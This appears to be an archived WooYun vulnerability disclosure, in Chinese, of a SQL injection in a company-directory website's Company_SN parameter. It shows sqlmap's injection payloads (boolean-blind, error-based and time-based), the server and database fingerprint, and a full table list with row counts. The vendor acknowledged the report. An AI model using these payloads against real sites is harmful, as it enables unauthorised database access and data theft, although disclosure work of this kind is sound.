乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-11: 细节已通知厂商并且等待厂商处理中 2016-01-12: 厂商已经确认,细节仅向厂商公开 2016-01-22: 细节向核心白帽子及相关领域专家公开 2016-02-01: 细节向普通白帽子公开 2016-02-11: 细节向实习白帽子公开 2016-02-22: 细节向公众公开
目标站点:http://**.**.**.**/一个提供大陆和台湾的公司目录的网址。英语不是很好,大概就是这样子。所以数据量巨大注入点:http://**.**.**.**/site/about_us/title31_c/index.php?Company_SN=19560
sqlmap identified the following injection point(s) with a total of 140 HTTP(s) requests:---Parameter: Company_SN (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Company_SN=19560 AND 1651=1651 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: Company_SN=19560 AND (SELECT 1414 FROM(SELECT COUNT(*),CONCAT(0x71716b7871,(SELECT (ELT(1414=1414,1))),0x7178767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: Company_SN=19560 AND (SELECT * FROM (SELECT(SLEEP(5)))gxXk)---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.3.16back-end DBMS: MySQL 5.0
current database: 'twinner'current user is DBA: Falseavailable databases [4]:[*] information_schema[*] muchcalm[*] twinner[*] twinner_dev
爆数据了,表和数据量真的不小哦!第一条就七百多万
Database: twinner+------------------------------------------+---------+| Table | Entries |+------------------------------------------+---------+| Product_Detail | 7043577 || Temp_Storage | 369603 || Product_Feature_Detail | 269950 || Product_Property | 251878 || Product | 162398 || Product_Site_Classify_Images | 58180 || Product_Feature_Relation | 48567 || Product_Feature | 48240 || upload | 38656 || Product_Classify | 33938 || Company_Member | 33461 || Product_MoreSpec | 27905 || Product_Site_Classify | 26732 || Inquiry_Title | 22181 || Inquiry_List | 21731 || Product_Property_Temp | 19409 || Product_Other_Image | 17131 || Inquiry_List2 | 16283 || Inquiry_Title2 | 15217 || Company_Member_Relation | 13951 || company_member_class | 13542 || Company | 13134 || Web_Connection | 9470 || Gbook_R | 8574 || Authority_Company_Site_Function | 7786 || Product_Price | 6978 || Company_Site_Function | 6959 || general_inquiry | 6770 || company_new_product | 6626 || Product_Temp | 6368 || FAQ | 5764 || Company_crm_contact | 4511 || customer_source | 4292 || Product_Index | 4040 || sp_s17 | 3366 || sp_fieldvalue | 3051 || crm2_sendmail | 3045 || end_user_classify | 2975 || Order_NO | 2889 || sp_s3 | 2803 || sp_s4 | 2736 || Site_News | 2695 || sp_s2 | 2587 || sp_s15 | 2436 || sp_s16 | 2432 || sp_s7 | 2403 || sp_s8 | 2333 || Product_Classify_3 | 2315 || Ad_Classify | 2312 || supplier_member_login | 2223 || s_S2 | 2189 || sp_s10 | 2168 || sp_s12 | 2151 || Product_Classify_AppRelation | 2075 || sp_s11 | 2075 || s_S1 | 2064 || Company_Site | 2027 || sp_s14 | 2015 || sp_s18 | 1881 || Company_Contact | 1847 || s_S3 | 1795 || Order_Detail | 1784 || sp_s6 | 1750 || analytic_mgmt | 1625 || sp_s1 | 1616 || sp_s9 | 1574 || sp_s13 | 1560 || sp_s5 | 1418 || s_fieldvalue | 1330 || s_S5 | 1275 || sp_s20 | 1271 || Site_Banner | 1257 || classify3 | 1248 || Company_Site_Function_copy | 1203 || s_S4 | 1202 || Competitor_Products | 1186 || Product_Tabview | 1181 || s_S6 | 1164 || Product_Classify_PitchRel | 1141 || About_US | 1133 || Product_Site_Classify_MoreSpec | 1096 || select_temp | 1043 || FAQ_Classify | 1017 || Solutions_Classify | 968 || inquiries | 902 || sp_s23 | 899 || Order_Title | 896 || sp_field | 808 || sp_s22 | 738 || forsale | 736 || sp_s19 | 731 || Safety_Relation | 714 || Contact_Us | 639 || Customer_Manager | 623 || keyword_search | 605 || Web_Connection_Temp | 600 || Authority_Group_Company_Relation | 544 || company_classify_keyword | 541 || App_Relation | 539 || Product_Classify_2 | 510 || sp_s21 | 503 || App_Classify | 474 || Letter | 460 || Authority_Product_Site_Classify_Function | 456 || Product_Other_Image_copy | 439 || Authority_Menu_Function | 438 || Web_Connection_Classify | 428 || Authority_FAQ_Classify_Function | 426 || Site_Home | 414 || wke_area | 371 || Product_MoreSpec_Temp | 345 || Code_Data | 344 || Company_keyword | 332 || s_S10 | 307 || Product_Structural_Images | 288 || sp_s24 | 284 || s_S8 | 270 || Region | 249 || Associate_Member | 248 || Authority_Menu_Collection | 243 || Product_App_Count | 238 || Associate | 217 || AppProduct | 211 || s_S7 | 210 || Service | 181 || sp_group | 167 || TempProduct | 149 || s_fieldname | 147 || Product_Safe_Image | 140 || Site_News_classify | 139 || campaign_supplier | 133 || gc_male | 131 || Attend_Member | 120 || Authority_Menu_Subsystem | 117 || Register | 112 || Associate_Member_Relation | 111 || Product_HowOrder_Images | 108 || company_note | 100 || Classify_MoreSpec | 97 || Service_Classify | 93 || customer_certif | 91 || classify2 | 89 || Product_Pitch_Count | 89 || template_record | 87 || Product_Detail_PDF | 86 || s_S9 | 85 || oem_odm | 81 || SN_Counter | 81 || Product_app_Classify_3 | 80 || Spec_Search | 64 || company_messenger | 61 || Product_Site_Classify_Rel | 61 || Site_Function | 59 || sp_s26 | 57 || City | 54 || Product_Property_hr_preset | 52 || Member_Bonus | 51 || Safety | 47 || sp_s25 | 46 || campaign_product | 45 || Product_Classify_1 | 44 || Carriage_Charge | 43 || customer_sales | 43 || Menu_Function | 43 || Product_factory_Relation | 43 || customer_staff | 41 || Product_Classify_Pitch | 38 || s_tablename | 37 || Inquiry_List_Temp | 35 || Authority_Group | 32 || sp_s27 | 31 || Product_MoreSpecAV | 29 || Letter_Title | 28 || factory | 26 || Gbook | 23 || history_record | 23 || Title | 23 || Code_Type | 22 || s_product | 22 || wke_country | 22 || order_factory_temp | 21 || Product_Classify_App | 19 || Company_crm_messenger | 18 || crm2_sendmail_content | 16 || Menu_Collection | 16 || factory_img | 15 || CompanyType | 14 || customer_sources | 13 || FAQ_MoreSpec | 13 || Product_Classify_0 | 13 || Car_Member | 12 || CRM_Manager | 12 || classify1 | 11 || end_user_classify_to_product | 11 || Member | 11 || Competitor_cols | 10 || Property | 10 || wke_lion | 10 || wke_lion_mgn | 10 || wke_plan | 10 || wke_plan_mgn | 10 || Modules | 9 || Product_app_Classify_2 | 8 || Sale_Contact | 7 || supplier_category | 7 || Twinner_Manager | 7 || verify_list | 7 || Carriage_Type | 6 || Company_Temp | 6 || mail_model | 6 || Menu_Subsystem | 6 || messenger_protocol | 6 || rotate_swf | 6 || Sale_Order | 6 || upload_av | 6 || cad_specify_cable | 5 || Charset | 5 || Letter_Sender_Title | 5 || programs | 5 || wke_block | 5 || wke_page | 5 || `Language` | 4 || gc_female | 4 || list_level | 4 || Sale_Master | 4 || Associate_Type | 3 || Product_Property_hr_title | 3 || Code_Temp | 2 || MinOrdUnit | 2 || Parameter_Sheet | 2 || Product_app_Classify_0 | 2 || Product_app_Classify_1 | 2 || product_quotation | 2 || wke_news | 2 || wke_school | 2 || number_manage | 1 || s_show | 1 || twinner_right_banner | 1 || wke_aboutus | 1 || wke_admuser | 1 || wke_child | 1 || wke_live | 1 || wke_method | 1 || wke_pic | 1 || wke_sponsor | 1 || wke_talk | 1 || wke_video | 1 |+------------------------------------------+---------+
危害等级:高
漏洞Rank:16
确认时间:2016-01-12 01:45
感謝通報
暂无
